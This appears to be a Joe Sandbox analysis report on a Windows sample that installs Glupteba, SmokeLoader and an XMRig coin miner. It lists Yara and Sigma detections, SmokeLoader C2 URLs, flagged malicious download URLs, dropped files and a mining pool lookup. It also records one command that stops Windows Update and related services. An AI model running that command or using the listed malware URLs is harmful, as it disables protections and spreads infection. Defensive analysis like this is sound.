39.2.updater.exe.7ff7fa990000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x5181c0:$s1: %s/%s (Windows NT %lu.%lu 0x5189e8:$s3: \\.\WinRing0_ 0x510ee8:$s4: pool_wallet 0x50ccf0:$s5: cryptonight 0x50cd00:$s5: cryptonight 0x50cd10:$s5: cryptonight 0x50cd20:$s5: cryptonight 0x50cd38:$s5: cryptonight 0x50cd48:$s5: cryptonight 0x50cd58:$s5: cryptonight 0x50cd70:$s5: cryptonight 0x50cd80:$s5: cryptonight 0x50cd98:$s5: cryptonight 0x50cdb0:$s5: cryptonight 0x50cdc0:$s5: cryptonight 0x50cdd0:$s5: cryptonight 0x50cde0:$s5: cryptonight 0x50cdf8:$s5: cryptonight 0x50ce10:$s5: cryptonight 0x50ce20:$s5: cryptonight 0x50ce30:$s5: cryptonight
5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
39.2.updater.exe.7ff7fa9d4540.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.updater.exe.7ff7fa9d4540.2.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
39.2.updater.exe.7ff7fa9d4540.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
39.2.updater.exe.7ff7fa9d4540.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Click to see the 22 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 6264, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected Glupteba

Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR

Antivirus detection for URL or domain

Source: http://host-host-file8.com/	URL Reputation: Label: malware
Source: http://host-file-host6.com/	URL Reputation: Label: malware
Source: https://allstatsin.ru	Avira URL Cloud: Label: malware
Source: http://jesuscolin.top/syncUpd.exehttps://iplogger.com/1aiQK4SOFTWARE	Avira URL Cloud: Label: malware
Source: http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.onion	Avira URL Cloud: Label: malware
Source: http://lazzarotata.icu/syncUpd.exedownload_quiet	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000003B.00000002.2612282713.00000000004C0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2020, "C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 73%

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\Broom.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\latestX.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\cdttvvc	ReversingLabs: Detection: 34%
Source: C:\Windows\Temp\whxcdqscjswq.tmp	ReversingLabs: Detection: 63%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\latestX.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cdttvvc	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Glupteba

Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f70e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.2f10e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3800000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.e0cbefcb1af40c7d4aff4aca26621a98.exe.3860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: e0cbefcb1af40c7d4aff4aca26621a98.exe PID: 3392, type: MEMORYSTR

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 39.2.updater.exe.7ff7fa9d7e20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.updater.exe.7ff7fa990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.updater.exe.7ff7fa9d4540.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.updater.exe.7ff7fa9d7e20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000003F.00000002.4558997865.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2708781420.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2708852084.0000000001958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2684879397.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.4558997865.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2708747670.0000000001975000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2708491367.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.4572426073.0000000001950000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2707785171.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2708950297.0000000001963000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.4558997865.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2684843852.00007FF7FA9B0000.00000004.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2708399343.0000000001979000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000003.2708993303.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\whxcdqscjswq.tmp, type: DROPPED

DNS related to crypt mining pools

Source: unknown

DNS query: name: xmr-eu1.nanopool.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Unpacked PE file: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe	Unpacked PE file: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Program Files\Google\Chrome\updater.exe

Directory created: C:\Program Files\Google\Libs

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Loader.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: e0cbefcb1af40c7d4aff4aca26621a98.exe
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: .pdb.dbg source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdbGCTL source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.00000000040D8000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000C7A000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000037E9000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
